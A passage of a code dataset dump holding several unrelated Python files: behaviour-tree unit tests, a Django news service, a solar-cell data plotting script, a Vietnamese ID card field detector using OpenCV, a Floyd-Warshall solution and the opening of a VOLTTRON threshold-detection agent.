call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: calculating: 2 + 4 = 6'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_delete AddTwoNumbersFallback3'),\n call('__del__ AddTwoNumbersFallback3')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback4(self):\n \"\"\"Tests the AddTwoNumbersFallback4.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.run(AddTwoNumbersFallback4)\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.FAILURE\n assert bt_runner._instance.get_contingency_message() == 'NOT_TWO_NUMBERS_PROVIDED'\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback4'),\n call('on_init AddTwoNumbersFallback4'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_delete AddTwoNumbersFallback4'),\n call('__del__ AddTwoNumbersFallback4')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback5(self):\n \"\"\"Tests the AddTwoNumbersFallback5.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.get_logger().set_log_level(LogLevel.DEBUG)\n bt_runner.run(AddTwoNumbersFallback5)\n assert mock.called\n assert bt_runner.get_status() == NodeStatus.ABORTED\n assert bt_runner.get_contingency_message() == 'NOT_TWO_NUMBERS_PROVIDED'\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback5'),\n call('on_init AddTwoNumbersFallback5'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('AddTwoNumbersFallback5: handle_missing_numbers'),\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_abort AddTwoNumbersFallback5'),\n call('on_delete AddTwoNumbersFallback5'),\n call('__del__ AddTwoNumbersFallback5')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback6(self):\n \"\"\"Tests the AddTwoNumbersFallback6.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.get_logger().set_log_level(LogLevel.DEBUG)\n bt_runner.run(AddTwoNumbersFallback6)\n assert mock.called\n assert bt_runner.get_status() == NodeStatus.SUCCESS\n assert bt_runner.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback6'),\n call('on_init AddTwoNumbersFallback6'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('AddTwoNumbersFallback6: handle_missing_numbers'),\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ HelloWorldAction'),\n call('HelloWorldAction: Hello World !!!'),\n call('__del__ HelloWorldAction'),\n call('on_delete AddTwoNumbersFallback6'),\n call('__del__ AddTwoNumbersFallback6')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback6a(self):\n \"\"\"Tests the AddTwoNumbersFallback6a.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.get_logger().set_log_level(LogLevel.DEBUG)\n bt_runner.run(AddTwoNumbersFallback6a)\n assert mock.called\n assert bt_runner.get_status() == NodeStatus.SUCCESS\n assert bt_runner.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback6a'),\n call('on_init AddTwoNumbersFallback6a'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: You did not provide two numbers!'), # noqa: E501\n call('AddTwoNumbersFallback6a: handle_missing_numbers'),\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('__init__ AddTwoNumbersActionWithFailure'),\n call('on_init AddTwoNumbersActionWithFailure'),\n call('AddTwoNumbersActionWithFailure: calculating: 3 + 6 = 9'), # noqa: E501\n call('on_delete AddTwoNumbersActionWithFailure'),\n call('__del__ AddTwoNumbersActionWithFailure'),\n call('on_delete AddTwoNumbersFallback6a'),\n call('__del__ AddTwoNumbersFallback6a')]\n\n ########################################################################\n\n def test_AddTwoNumbersFallback7(self):\n \"\"\"Tests the AddTwoNumbersFallback7.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.get_logger().set_log_level(LogLevel.DEBUG)\n bt_runner.run(AddTwoNumbersFallback7)\n assert mock.called\n assert bt_runner.get_status() == NodeStatus.ABORTED\n assert bt_runner.get_contingency_message() == 'TIMEOUT'\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AddTwoNumbersFallback7'),\n call('on_init AddTwoNumbersFallback7'),\n call('__init__ AddTwoNumbersLongRunningAction'),\n call('on_init AddTwoNumbersLongRunningAction'),\n call('AddTwoNumbersLongRunningAction: calculating 2000 ms ...'), # noqa: E501\n call('on_timeout AddTwoNumbersFallback7'),\n call('on_abort AddTwoNumbersLongRunningAction'),\n call('on_delete AddTwoNumbersLongRunningAction'),\n call('on_abort AddTwoNumbersFallback7'),\n call('__del__ AddTwoNumbersLongRunningAction'),\n call('on_delete AddTwoNumbersFallback7'),\n call('__del__ AddTwoNumbersFallback7')]\n\n ########################################################################\n\n def test_AsyncAddChildFallback(self):\n \"\"\"Tests the AsyncAddChildFallback.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.run(AsyncAddChildFallback, '')\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.SUCCESS\n assert bt_runner._instance.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ AsyncAddChildFallback'),\n call('on_init AsyncAddChildFallback'),\n call('AsyncAddChildFallback: DONE'),\n call('__init__ HelloWorldAction'),\n call('HelloWorldAction: Hello World !!!'),\n call('__del__ HelloWorldAction')]\n\n ########################################################################\n\n def test_RemoveAllChildrenFallback(self):\n \"\"\"Test the `RemoveAllChildrenFallback` node.\"\"\"\n mock.reset_mock()\n bt_runner = BehaviorTreeRunner()\n bt_runner.run(RemoveAllChildrenFallback, '')\n assert mock.called\n assert bt_runner._instance.get_status() == NodeStatus.SUCCESS\n assert bt_runner._instance.get_contingency_message() == ''\n print(mock.call_args_list)\n assert mock.call_args_list == [call('__init__ RemoveAllChildrenFallback'),\n call('on_init RemoveAllChildrenFallback')]\n","repo_name":"careBT/carebt_core","sub_path":"tests/test_fallbackNode.py","file_name":"test_fallbackNode.py","file_ext":"py","file_size_in_byte":16162,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"16018935173","text":"from django.http import Http404\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Q\nfrom django.db.models import F\nfrom django.db.models import Count\nfrom django.utils import timezone\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom django.conf import settings\n\nfrom ..models import Category\nfrom ..models import News\nfrom ..models import Comment\n\n\nclass NewsService():\n def __init__(self):\n pass\n\n def getAll(self):\n news = None\n try:\n news = News.objects.all()\n except Exception as e: raise Http404(\"DB Error: Cant get all news\")\n return news\n \n def getById(self, id):\n news = None\n try:\n news = News.objects.get(id=id)\n except Exception as e: raise Http404(\"DB Error: Cant get news by id\")\n return news\n \n def getPublic(self):\n try:\n news = News.objects.filter(content_type_id=2)\n except Exception as e: raise Http404(\"DB Error: Cant get public news\")\n return news\n\n def getAllByCategoryId(self, id):\n try:\n news = News.objects.filter(category_id=id)\n except Exception as e: raise Http404(\"DB Error: Cant get news by category id\")\n return news\n\n def getPublicByCategoryId(self, id):\n try:\n news = News.objects.filter(category_id=id, content_type_id=2)\n except Exception as e: raise Http404(\"DB Error: cant get public news by category\")\n return news\n\n def searchByKeyword(self, keyword):\n try:\n news = News.objects.filter(Q(content__icontains=keyword) | Q(title__icontains=keyword))\n except Exception as e: raise Http404(\"DB Error: cant get searched news\")\n return news\n\n def updateViewCount(self, news_id):\n try:\n News.objects.filter(id=news_id).update(views=F('views')+1)\n except Exception as e: raise Http404(\"DB Error: cant update the view count\")\n \n def getRecentMostCommentedNews(self):\n try:\n check_date = timezone.now() + relativedelta(months=-settings.RECENT_NEWS_MONTH)\n news = Comment.objects.filter(news__publish_date__gt=check_date).values('news_id', 'news__title', 'news__views').annotate(total=Count('news_id'))\n return news\n except Exception as e: raise Http404(\"DB Error: cant get the most commented news\") \n\n\nclass CategoryService():\n def __init__(self):\n pass\n \n def getAll(self):\n try:\n categories = Category.objects.all()\n except Exception as e: raise Http404(\"DB Error: cant get all categories\")\n return categories \n\n def getPublic(self):\n try:\n categories = Category.objects.filter(content_type_id=2)\n except Exception as e: raise Http404(\"DB Error: cant get public categories\")\n return categories\n\nclass CommentService():\n def __init__(self):\n pass\n \n def getByNewsId(self, news_id):\n try:\n comments = Comment.objects.filter(news_id=news_id)\n except Exception as e: raise Http404(\"DB Error: cant get comment by news id\")\n return comments \n\n def saveNewComment(self, form_data):\n try:\n news = NewsService().getById(form_data[\"news_id\"])\n comments = Comment(text=form_data[\"text\"], news = news, user = form_data[\"user\"]) \n comments.save()\n except Exception as e: raise Http404(\"DB Error: Could not save comment\")\n\n","repo_name":"nash90/news-app","sub_path":"app/news/service/news_service.py","file_name":"news_service.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"7935094999","text":"import datetime\nimport os\nimport pandas as pd\nimport json\nimport numpy as np\n#import plotly\n#import plotly.express as px\nimport plotly.graph_objects as go\nfrom IPython.display import display\n\ntest_name =['damp-heat','light-dark-cycle','mpp'] \ndamp_heat= 'damp-heat'\nlight_cycle= 'light-dark-cycle'\nmpp= 'mpp'\nbatch_name='old'\nignore_broken_cell = True\n\n\ndef read_modules(folder):\n '''\n read all xlsm name\n '''\n filename_list=[]\n for root, ds, fs in os.walk(folder):\n for f in fs:\n filename_list.append(f)\n return filename_list\n\n\ndef read_cell_pce(file_path,filename):\n '''\n read cell performance in one xlsm\n '''\n file_path = file_path+filename\n df = pd.read_excel(file_path, sheet_name = \"Sheet2\")\n df.dropna(axis=1,inplace=True)\n df.drop(index=0,inplace=True)\n df.drop(['Hystersis'],axis=1,inplace=True)\n \n df['name'] = pd.to_datetime(df['name'])\n start_time= df.at[1, 'name']\n start_state = df.iloc[0]\n data_list = []\n ratio_list= []\n max_pce=[]\n max_pce_ratio=[]\n all_time=set()\n for index, row in df.iterrows():\n hour_data= []\n hour_data_ratio=[]\n hours = (row['name']-start_time).total_seconds()/3600\n hour_data.append(hours)\n all_time.add(hours)\n hour_data_ratio.append(hours)\n hour_data_ratio.append(row['name'])\n for i, v in row.iteritems():\n hour_data.append(v)\n if i == 'PCE_r':\n max_pce.append((hours,v))\n max_pce_ratio.append((hours,v/start_state[i]))\n if i!='name':\n hour_data_ratio.append(v/start_state[i]) \n data_list.append(hour_data)\n ratio_list.append(hour_data_ratio)\n \n filename = filename[:-5]\n if 'UV' in filename:\n filename = filename.replace('UV','')+\" with UV filter\"\n data ={'test_type':file_path.split('/')[2],'cell_name':filename,'cell_data':data_list,'data_ratio':ratio_list,'max_pce':max_pce,'max_pce_ratio':max_pce_ratio,'all_time':sorted(all_time)}\n return(data)\n\n\ndef read_all_test():\n '''\n generate all cell performance from all xlsm files\n '''\n all_test_data = []\n for i in test_name:\n file_path='./'+batch_name+'/'+i+'/'\n name_list = read_modules(file_path)\n for j in name_list:\n if (\"Broken\" in j) and (ignore_broken_cell is True):\n continue\n else:\n all_test_data.append(read_cell_pce(file_path,j))\n return(all_test_data)\n\n\ndef draw_cell_PCE_overview(data_list):\n '''\n draw all cell PCE data\n '''\n categories = []\n for i in data_list:\n categories.extend(i['all_time'])\n categories = sorted(set(categories))\n fig = go.Figure()\n \n for i in data_list:\n cell_array = [np.nan]*len(categories)\n for j in i['max_pce']:\n cell_array[categories.index(j[0])] = j[1]\n fig.add_trace(\n go.Scatter(\n x = categories,\n y = cell_array,\n name = i['test_type']+': '+i['cell_name'],\n line_shape = 'linear',\n mode = 'lines+markers',\n connectgaps=True\n )\n )\n fig.update_layout(title='PCE', \n #width = 800,\n height = 600,\n xaxis = dict(\n tickmode = 'array',\n tickvals = categories\n )) \n fig.show()\n \n\ndef draw_cell_PCE_overview_ratio(data_list):\n '''\n draw all cell PCE ratio\n '''\n categories = []\n for i in data_list:\n categories.extend(i['all_time'])\n categories = sorted(set(categories))\n fig = go.Figure()\n fig.add_hline(y=0.9)\n for i in data_list:\n cell_array = [np.nan]*len(categories)\n for j in i['max_pce_ratio']:\n cell_array[categories.index(j[0])] = j[1]\n fig.add_trace(\n go.Scatter(\n x = categories,\n y = cell_array,\n name = i['test_type']+': '+i['cell_name'],\n line_shape = 'linear',\n mode = 'lines+markers',\n connectgaps=True\n )\n )\n fig.update_layout(title='PCE Ratio',\n #width = 800,\n height = 600,\n xaxis = dict(\n tickmode = 'array',\n tickvals = categories\n )) \n fig.show()\n \n \ndef draw_cell_performance(data_list):\n '''\n draw 'Voc_r','Jsc_r','FF_r','PCE_r','Voc_f','Jsc_f','FF_f','PCE_f' from each cell\n '''\n categories = ['Voc_r','Jsc_r','FF_r','PCE_r','Voc_f','Jsc_f','FF_f','PCE_f']\n Columns = ['Hours', 'Voc_r','Jsc_r','FF_r','PCE_r','Voc_f','Jsc_f','FF_f','PCE_f']\n for i in data_list:\n fig = go.Figure()\n dataframe = []\n for j in range(len(i['data_ratio'])):\n data = i['data_ratio'][j][2:]\n #datalist = i['cell_data'][j][2:]\n datalist = i['cell_data'][j][2:]\n datalist.insert(0, i['cell_data'][j][0])\n #print(datalist)\n dataframe.append(datalist)\n fig.add_trace(go.Scatterpolar(\n r=data,\n theta=categories,\n name=str(i['data_ratio'][j][0])\n ))\n fig.update_layout(\n #width = 800,\n height = 600,\n polar=dict(\n radialaxis=dict(\n visible=True,\n title=dict(\n text = i['test_type'] + ': '+i['cell_name'],\n font=dict(\n size = 30\n )\n )\n #i['test_type'] + ': '+i['cell_name'],\n )\n ),\n showlegend=True\n )\n fig.show()\n display(pd.DataFrame(dataframe,columns=Columns))\n\n\ndef read_performance(data_list):\n cell_performance=dict()\n cell_performance_ratio = dict()\n cell_PCE_overview=dict()\n cell_PCE_overview_ratio = dict()\n for i in data_list:\n cell_performance = []\n overview_performance = dict()\n overview_performance_ratio = dict()\n for j in i['cell_data']:\n cell_performance_per_hours=dict()\n cell_performance_per_hours['Voc_r'] = j[2]\n cell_performance_per_hours['Jsc_r'] = j[3]\n cell_performance_per_hours['FF_r'] = j[4]\n cell_performance_per_hours['PCE_r'] = j[5]\n cell_performance_per_hours['Voc_f'] = j[6]\n cell_performance_per_hours['Jsc_f'] = j[7]\n cell_performance_per_hours['FF_f'] = j[8]\n cell_performance_per_hours['PCE_f'] = j[9]\n cell_performance[j[0]] = cell_performance_per_hours\n for j in i['data_ratio']:\n cell_performance_per_hours=dict()\n cell_performance_per_hours['Voc_r'] = j[2]\n cell_performance_per_hours['Jsc_r'] = j[3]\n cell_performance_per_hours['FF_r'] = j[4]\n cell_performance_per_hours['PCE_r'] = j[5]\n cell_performance_per_hours['Voc_f'] = j[6]\n cell_performance_per_hours['Jsc_f'] = j[7]\n cell_performance_per_hours['FF_f'] = j[8]\n cell_performance_per_hours['PCE_f'] = j[9]\n cell_performance_ratio[j[0]] = cell_performance_per_hours\n for j in i['max_pce']:\n overview_performance[j[0]] = j[1]\n for j in i['max_pce_ratio']:\n overview_performance_ratio[j[0]] = j[1]\n cell_performance[i['cell_name']] = overview_performance\n cell_performance_ratio[i['cell_name']] = overview_performance_ratio\n cell_PCE_overview[i['cell_name']] = overview_performance\n cell_PCE_overview_ratio[i['cell_name']] = overview_performance_ratio\n\n","repo_name":"wangweialkane/module-stability","sub_path":"main_function.py","file_name":"main_function.py","file_ext":"py","file_size_in_byte":7892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42577700554","text":"import cv2\nimport numpy as np\nimport statistics\nimport copy\nimport pytesseract\nfrom PIL import Image\nfrom util.util import get_contour_boxes, get_img_from_box, get_threshold_img, find_max_box, show_img, draw_rec, plot_img\nfrom util.resize import resize_img_by_height, resize_img_by_width\n\n\ndef cropout_unimportant_part(img):\n h, w, _ = img.shape\n x = get_information_x_axis(img)\n y = get_information_y_axis(img)\n pic = img[int(1.2*y):int(0.9*h), 0:int(0.9 * x)]\n img = img[y:h, x:w]\n\n return img, pic\n\n\ndef crop_label(img):\n h, w, _ = img.shape\n img = img[0:int(0.9*h), 0:int(0.1 * w)]\n return img\n\n\ndef get_info_list(img, contour_boxes):\n contour_boxes.sort(key=lambda tup: tup[1])\n height, width, _ = img.shape\n list_info = []\n for index, l in enumerate(contour_boxes):\n x, y, w, h = l\n y = y - 20\n if index != len(contour_boxes) - 1:\n x1, y1, _, _ = contour_boxes[index+1]\n list_info.append((x, y, width, y1))\n else:\n list_info.append((x, y, width, height))\n return list_info\n\n\ndef get_main_text(img, box, kernel_height):\n x0, y0, x1, y1 = box\n img = img[y0:y1, x0:x1]\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (25, 25))\n thresh = get_threshold_img(img, kernel)\n kernel = cv2.getStructuringElement(\n cv2.MORPH_RECT, (thresh.shape[1], kernel_height))\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n contour_boxes = get_contour_boxes(dilation)\n max_box = max(contour_boxes, key=lambda tup: tup[2] * tup[3])\n x, y, w, h = max_box\n return (x0+x, y0+y, x0+x+w, y0+y+h)\n\n\ndef remove_name_label(group, width):\n avg = statistics.mean(map(lambda t: t[-1], group))\n group_orig = copy.deepcopy(group)\n for element in group_orig:\n if element[0] < width/10:\n group.remove(element)\n elif element[-1] < avg and element[0] < width/5:\n group.remove(element)\n return group\n\n\ndef remove_smaller_area(group, width):\n avg = statistics.mean(map(lambda t: t[-1] * t[-2], group))\n group_orig = copy.deepcopy(group)\n for element in group_orig:\n if element[0] < width/10:\n group.remove(element)\n elif element[-1] * element[-2] < avg and element[0] < width/5:\n group.remove(element)\n return group\n\n\ndef get_name(img, box):\n x0, y0, x1, y1 = box\n img = img[y0:y1, x0:x1]\n height, width, _ = img.shape\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (25, 25))\n thresh_img = get_threshold_img(img, kernel)\n contour_boxes = get_contour_boxes(thresh_img)\n contour_boxes = remove_smaller_area(contour_boxes, width)\n contour_boxes = remove_name_label(contour_boxes, width)\n contour_boxes.sort(key=lambda t: t[0])\n x, y, w, h = find_max_box(contour_boxes)\n return (x0+x, y0+y, x0+x+w, y0+y+h)\n\n\ndef get_text_from_two_lines(img, box):\n x0, y0, x1, y1 = box\n img = img[y0:y1, x0:x1]\n kernel = np.ones((25, 25), np.uint8)\n thresh = get_threshold_img(img, kernel)\n height, width = thresh.shape\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n contour_boxes = get_contour_boxes(dilation)\n avg = statistics.mean(map(lambda t: t[-1]*t[-2], contour_boxes))\n boxes_copy = copy.deepcopy(contour_boxes)\n for box in boxes_copy:\n box_height = box[1] + box[3]\n height_lim = 0.9 * height\n if box[1] > height_lim:\n contour_boxes.remove(box)\n elif box_height == height and box[1] > 0.8 * height:\n contour_boxes.remove(box)\n elif box[-1] * box[-2] < avg/3:\n contour_boxes.remove(box)\n x, y, w, h = find_max_box(contour_boxes)\n if h < 55:\n return (x0+x, y0+y, x0+x+w+5, y0+y+h+5)\n else:\n crop_img = thresh[y:y+h, x:width]\n height, width = crop_img.shape\n hist = cv2.reduce(crop_img, 1, cv2.REDUCE_AVG).reshape(-1)\n hist = uppers = [hist[y] for y in range(height//3, 2*height//3)]\n line = uppers.index(min(uppers)) + height//3\n first_line = (x0+x, y0+y, x0+x+w, y0+y+line)\n second_line = (x0+x, y0+y+line, x0+x+w, y0+y+h)\n return [first_line, second_line]\n\n\ndef get_two_lines_img(img, box):\n x0, y0, x1, y1 = box\n img = img[y0:y1, x0:x1]\n kernel = np.ones((25, 25), np.uint8)\n thresh = get_threshold_img(img, kernel)\n height, width = thresh.shape\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n contour_boxes = get_contour_boxes(dilation)\n avg = statistics.mean(map(lambda t: t[-1]*t[-2], contour_boxes))\n boxes_copy = copy.deepcopy(contour_boxes)\n for box in boxes_copy:\n box_height = box[1] + box[3]\n height_lim = 0.9 * height\n if box[1] > height_lim:\n contour_boxes.remove(box)\n elif box_height == height and box[1] > 0.8 * height:\n contour_boxes.remove(box)\n elif box[-1] * box[-2] < avg/3:\n contour_boxes.remove(box)\n x, y, w, h = find_max_box(contour_boxes)\n return (x0+x, y0+y, x0+x+w+5, y0+y+h+5)\n\n\ndef process_result(orig, ratio, result):\n if type(result) is tuple:\n return [get_img_from_box(orig, ratio, result, padding=2)]\n if type(result) is list:\n first_line = get_img_from_box(orig, ratio, result[0], padding=2)\n first_line = cut_blank_part(first_line)\n second_line_img = get_img_from_box(orig, ratio, result[1], padding=2)\n second_line = cut_blank_part(second_line_img)\n return [first_line, second_line]\n\n\ndef get_last_y(result):\n if type(result) is tuple:\n return result[-1]\n if type(result) is list:\n return result[1][-1]\n\n\ndef cut_blank_part(img, padding=5):\n img_h, img_w, _ = img.shape\n kernel = np.ones((25, 25), np.uint8)\n thresh = get_threshold_img(img, kernel)\n contour_boxes = get_contour_boxes(thresh)\n avg = statistics.mean(map(lambda t: t[-1], contour_boxes))\n boxes_copy = copy.deepcopy(contour_boxes)\n for box in boxes_copy:\n if box[-1] < avg/2:\n contour_boxes.remove(box)\n elif box[1] > img_h/2 and box[0] < img_w/10:\n contour_boxes.remove(box)\n elif box[1] < img_h/10 and box[-1] < img_h/5:\n contour_boxes.remove(box)\n x, y, w, h = find_max_box(contour_boxes)\n new_width = x + w + padding\n if new_width > img_w:\n new_width = img_w\n return img[0:img_h, x: new_width]\n\n\ndef get_information_x_axis(img):\n img, ratio = resize_img_by_height(img)\n h, w, _ = img.shape\n img_resize = img[100:400, int(0.25*w):int(0.4*w)]\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (100, 100))\n thresh = get_threshold_img(img_resize, kernel)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, h))\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n cnts = get_contour_boxes(dilation)\n cnts_copy = copy.deepcopy(cnts)\n for cnt in cnts_copy:\n if cnt[0] < 0.1*img_resize.shape[1]:\n cnts.remove(cnt)\n max_cnt = max(cnts, key=lambda x: x[-1] * x[-2])\n return int((max_cnt[0]-5+0.25*w)*ratio)\n\n\ndef get_information_y_axis(img):\n img, ratio = resize_img_by_width(img)\n h, w, _ = img.shape\n img_resize = img[0:int(0.4*h), 125:w]\n gray = cv2.cvtColor(img_resize, cv2.COLOR_BGR2GRAY)\n kernel = np.ones((25, 25), np.uint8)\n blackhat = cv2.morphologyEx(gray, cv2.MORPH_BLACKHAT, kernel)\n thresh = cv2.threshold(\n blackhat, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (20, 3))\n dilation = cv2.dilate(thresh, kernel, iterations=1)\n cnts = get_contour_boxes(dilation)\n cnts_copy = copy.deepcopy(cnts)\n for cnt in cnts_copy:\n if cnt[1]+cnt[-1] > 0.95 * img_resize.shape[0]:\n cnts.remove(cnt)\n elif cnt[-2] < 150:\n cnts.remove(cnt)\n max_cnt = max(cnts, key=lambda x: x[1])\n return int((max_cnt[1]-5)*ratio)\n\n\ndef detect_info(img):\n img, face = cropout_unimportant_part(img)\n orig = img.copy()\n img, ratio = resize_img_by_height(img)\n label_img = crop_label(img)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 15))\n threshold_img = get_threshold_img(label_img, kernel)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (label_img.shape[1]//2, 5))\n dilation = cv2.dilate(threshold_img, kernel, iterations=1)\n contour_boxes = get_contour_boxes(dilation)\n contour_boxes.sort(key=lambda t: t[2] * t[3], reverse=True)\n contour_boxes = contour_boxes[:5]\n info_list = get_info_list(img, contour_boxes)\n # get number part\n x, y, _, _ = info_list[0]\n number_box = (0, 0, img.shape[1], info_list[0][1])\n number_box = get_main_text(img, number_box, 5)\n number_img = get_img_from_box(orig, ratio, number_box)\n # get name part\n name_box = info_list[0]\n name_box = get_name(img, get_main_text(img, name_box, 5))\n name_img = get_img_from_box(orig, ratio, name_box, padding=2)\n name_img = cut_blank_part(name_img)\n # get dob part\n dob_box = info_list[1]\n dob_box = get_main_text(img, dob_box, 5)\n dob_img = get_img_from_box(orig, ratio, dob_box)\n # get gender_and national part\n gender_and_nationality_box = info_list[2]\n gender_and_nationality_box = get_main_text(\n img, gender_and_nationality_box, 5)\n gender_n_nation_img = get_img_from_box(\n orig, ratio, gender_and_nationality_box, padding=2)\n h, w, _ = gender_n_nation_img.shape\n gender_img = gender_n_nation_img[0:h, 0:int(w/3)]\n nation_img = gender_n_nation_img[0:h, int(w/3):int(w)]\n nation_img = cut_blank_part(nation_img)\n # get country part\n country_box = info_list[3]\n x, y, x1, y1 = country_box\n last_y = gender_and_nationality_box[-1]\n country_img = process_result(\n orig, ratio, get_two_lines_img(img, (x, last_y, x1, y1)))[0]\n country_result = get_text_from_two_lines(img, (x, last_y, x1, y1))\n country_img_list = process_result(orig, ratio, country_result)\n address_box = info_list[4]\n x, y, x1, y1 = address_box\n last_y = get_last_y(country_result)\n address_img = process_result(\n orig, ratio, get_two_lines_img(img, (x, last_y, x1, y1)))[0]\n result = get_text_from_two_lines(img, (x, last_y, x1, y1))\n address_img_list = process_result(orig, ratio, result)\n return face, number_img, name_img, dob_img, gender_img, nation_img, country_img, \\\n address_img, country_img_list, address_img_list\n","repo_name":"thelong0705/vietnamese-id-card-ocr","sub_path":"detector/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":10543,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"51"} +{"seq_id":"73883381919","text":"# 플로이드 와샬의 기본 개념은 i에서 출발해 j로 가는 경로의 가중치를 저장하는 2차원 배열을 채우는데,\n# i를 출발해 j로 바로 가는 것보다 k를 거쳐 j로 가는 게 효율적일 경우(저렴할 경우) 해당 값을 갱신해준다.\n# k의 값을 가장 바깥 for문에서 반복해주므로 하나의 경유지 k만 거치는 것뿐만 아니라 여러 경유지를 거치는 경로또한 포함한다.\n# k : 경유지\n# for k in range(1, v+1):\n# # i : 출발지\n# for i in range(1, v+1):\n# # j : 목적지\n# for j in range(1, v+1):\n# dp[i][j] = min(dp[i][j], dp[i][k] + dp[k][j])\n# <출처 : https://seoyoung2.github.io/algorithm/2020/07/22/Floyd-Warshall.html>\n\n\n\nINF = 987654321\nn = int(input())\nm = int(input())\n\ndist = [[INF]*(n+1) for _ in range(n+1)]\n\nfor i in range(m):\n a,b,c = map(int,input().split())\n # dist[a][b] = c\n dist[a][b] = min(dist[a][b],c)\n\nfor k in range(1,n+1):\n dist[k][k] = 0\n for i in range(1,n+1):\n for j in range(1,n+1):\n if dist[i][j] > dist[i][k] + dist[k][j]:\n dist[i][j] = dist[i][k] + dist[k][j]\n\nfor i in range(1,n+1):\n for j in range(1,n+1):\n if dist[i][j] == INF:\n dist[i][j] = 0\n print(dist[i][j], end=\" \")\n print()","repo_name":"yoonjung1205/ALGORITHM","sub_path":"BOJ/여러주제들/11404_플로이드.py","file_name":"11404_플로이드.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74532529759","text":"import logging\nimport sys\nimport uuid\n\nfrom volttron.platform.vip.agent import Agent, Core, PubSub, RPC, compat\nfrom volttron.platform.agent import utils\nfrom volttron.platform.messaging.health import Status, STATUS_BAD\n\nutils.setup_logging()\n_log = logging.getLogger(__name__)\n__version__ = '3.5'\n\n\ndef thresholddetection_agent(config_path, **kwargs):\n \"\"\"Load configuration for ThresholdDetectionAgent\n\n :param config_path: Path to a configuration file.\n\n :type config_path: str\n :returns: ThresholdDetectionAgent instance\n :rtype: ThresholdDetectionAgent\n \"\"\"\n config = utils.load_config(config_path)\n vip_identity = 'platform.thresholddetection'\n kwargs.pop('identity', None)\n return ThresholdDetectionAgent(config, identity=vip_identity)\n\n\nclass ThresholdDetectionAgent(Agent):\n \"\"\"\n Listen to topics and publish alerts when thresholds are passed.\n\n The 